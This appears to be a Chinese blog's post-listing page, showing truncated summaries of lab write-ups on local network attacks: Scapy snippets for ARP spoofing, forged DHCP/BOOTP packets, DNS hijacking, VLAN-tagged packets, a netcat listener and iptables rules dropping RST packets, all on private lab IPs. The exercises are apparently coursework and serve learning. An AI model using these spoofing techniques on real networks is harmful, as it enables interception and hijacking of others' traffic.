摘要: A机 222还是17看实际情况修改 ARP victim_ip = "192.168.222.133" ghost_ip = "192.168.222.17" arp_pkt = ARP(op=2, pdst=victim_ip, psrc=ghost_ip) print(f"开始 ARP 欺骗: 阅读全文
posted @ 2026-01-14 18:40 suiseiseki 阅读(12) 评论(0) 推荐(0)
摘要: #如果不需要伪装就去掉阶段二,并且将ghost_ip更改为正常kali A的IP 🟢 阶段一:启动受害者服务 (主机 B - 192.168.17.129) nc -nvlp 20003 🔵 阶段二:实施 ARP 欺骗 (主机 A - 终端 1) sudo scapy 在Scapy中: vict 阅读全文
posted @ 2026-01-14 18:26 suiseiseki 阅读(4) 评论(0) 推荐(0)
摘要: # 1. 定义伪造的 MAC 地址 my_mac = "00:11:22:33:44:55" my_mac_bytes = b'\x00\x11\x22\x33\x44\x55' # 2. 构造 BOOTP 必须的 16字节 chaddr (MAC 6字节 + 填充 10字节) chaddr_pad 阅读全文
posted @ 2026-01-14 18:14 suiseiseki 阅读(8) 评论(0) 推荐(0)
摘要: 环境准备 主机 A (攻击者): IP 192.168.222.132 主机 B (受害者): IP 192.168.222.133 网关: IP 192.168.222.2 目标DNS: IP 192.168.222.200 按顺序一路往下打就好 题目要求劫持为什么就直接更改rdata=“192. 阅读全文
posted @ 2026-01-14 09:38 suiseiseki 阅读(6) 评论(0) 推荐(0)
摘要: KALI A(192.168.222.132)攻击 KALI B(192.168.23.133)被攻击 阶段一:KALI B启动ARP欺骗 #有效期更改为下述标红内容的标绿部分:ttl。 #如果解析为正常攻击机IP就去掉ARP欺骗。 #伪造IP部分更改为攻击机IP(查找替换将所有17.17替换为23 阅读全文
posted @ 2026-01-14 09:33 suiseiseki 阅读(8) 评论(0) 推荐(0)
摘要: pkt = Ether() / Dot1Q(vlan=10)/IP(dst="192.168.222.133") / ICMP() sendp(pkt,verbose=0) 阅读全文
posted @ 2026-01-14 09:19 suiseiseki 阅读(5) 评论(0) 推荐(0)
摘要: Kali A sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP echo "1111" > index.html python -m SimpleHTTPServer 8000 kali B sudo iptables -A OUT 阅读全文
posted @ 2026-01-14 09:08 suiseiseki 阅读(7) 评论(0) 推荐(0)
摘要: 代码 # 1. 定义伪造的 MAC 地址 my_mac = "00:11:22:33:44:55" my_mac_bytes = b'\x00\x11\x22\x33\x44\x55' # 2. 构造 BOOTP 必须的 16字节 chaddr (MAC 6字节 + 填充 10字节) chaddr_ 阅读全文
posted @ 2026-01-14 09:03 suiseiseki 阅读(4) 评论(0) 推荐(0)